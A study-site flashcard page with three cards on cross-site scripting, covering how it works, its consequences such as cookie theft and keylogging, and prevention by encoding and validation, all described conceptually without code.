Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Cyber Security > Web Security > Flashcards

Web Security Flashcards

1
Q

What is Cross-Site Scripting (XSS) and how does it work?
(5)

What is a subtype of XSS?

A

XSS is a code injection attack that allows attacker to execute malicious JavaScript in another user’s browser.
Attacker doesn’t directly target victim.
Attacker exploits vulnerability in a website that the victim visits.
Website will deliver the malicious JavaScript.
Malicious JavaScript appears to be a legit part of the website.
Can use SQL injection to insert malicious JavaScript code.

Subtype: Self-XSS. Using social engineering, trick users to execute malicious JavaScript to their browser.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Name three consequences of Cross-Site Scripting attacks.

A
  1. Cookie theft
  2. Key logging, using addEventListener
  3. Phishing, inserting a fake login form into the page using DOM manipulation
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What are two methods of preventing XSS?

A
  1. Encoding = escapes the user input so that the browser only interprets it as data, not as code.
  2. Validation = filters the user input so that the browser only interprets it as code without malicious commands.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly

Cyber Security (19 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions